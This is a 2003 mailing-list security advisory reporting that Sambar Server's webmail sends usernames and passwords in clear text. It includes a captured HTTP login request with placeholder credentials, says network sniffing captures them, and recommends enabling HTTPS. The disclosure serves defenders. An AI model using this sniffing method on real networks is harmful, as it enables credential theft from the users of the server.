From gregory.lebras@security-corporation.com Wed Apr 23 19:18:26 2003 From: Gregory LEBRAS To: vulnwatch@vulnwatch.org Date: Thu, 24 Apr 2003 00:43:00 +0200 Subject: [VulnWatch] [SCSA-018] Disclosure of authentication information in Sambar Server [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] ====================================================================== Security Corporation Security Advisory [SCSA-018] Disclosure of authentication information in Sambar Server ====================================================================== PROGRAM: Sambar Server HOMEPAGE: http://www.sambar.com/ VULNERABLE VERSIONS: 6.0 Beta 1 5.3 5.2 and prior ? RISK: Low/Medium IMPACT: Disclosure of authentication information RELEASE DATE: 2003-04-24 Security Corporation's Free weekly Newsletter : http://www.security-corporation.com/newsletter.html ====================================================================== TABLE OF CONTENTS ====================================================================== 1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES 10............................................................FEEDBACK 1. DESCRIPTION ====================================================================== "Sambar Server is the new standard in high performance multi-functional servers with features rivaling other commercial products selling separately for several hundreds of dollars. It's Winsock2 compliant Win32 integration functions on Windows 95, Windows 98, Windows NT, Win2000, and XP as a service or as an application." (direct quote from http://sambar.jalyn.net) 2. DETAILS ====================================================================== - Disclosure of authentication information : A security vulnerability in Sambar Server Pro Server allow an attacker to view the username and password of an user who login on the webmail. Indeed, when logging in on the WebMail part of Sambar Server Pro Server, the username and password is sent in clear text. A remote attacker with access to the target user's or target server's traffic stream can view the username and the password. 3. EXPLOIT ====================================================================== - Disclosure of authentication information : This vulnerability can be easily exploited by an attacker who is on the same network. He can put a network sniffer on the network and sniff the username and password sent in clear by Sambar Server Pro Server. Here a capture of the HTTP Headers : -------CUT------- POST /session/login HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://[target]/sysuser/webmail/ Accept-Language: fr Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: 192.168.0.23 Content-Length: 200 Pragma: no-cache Connection: keep-alive Browser reload detected... Posting 200 bytes... RCpage=%2Fsysuser%2Fwebmail%2Fwebmail.stm onfailure=%2Fsysuser%2Fwebmail%2Frelogin.htm start=1 RCSdesktop=false RCSsort=desc RCSfolder=inbox RCShome=%2Fsysuser%2Fwebmail RCuser=administrator RCpwd=thepassword -------CUT------- 4. SOLUTIONS ====================================================================== No solution for the moment. 5. WORKAROUND ====================================================================== We strongly urge you to starting the HTTPS Server. The HTTPS server does not start by default, it must be enabled via the config.ini file entry Act As HTTPS Server = true. 6. DISCLOSURE TIMELINE ====================================================================== 19/04/2003 Vulnerability discovered 19/04/2003 Vendor notified 20/04/2003 Security Corporation clients notified 23/04/2003 Vendor response 24/04/2003 Public disclosure 7. CREDITS ====================================================================== Discovered by Gregory Le Bras 8. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 9. REFERENCES ====================================================================== - Original Version: http://www.security-corporation.com/advisories-018.html - Version Française: http://www.security-corporation.com/index.php?id=advisories&a=018-FR 10. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Security Corporation http://www.security-corporation.com info@security-corporation.com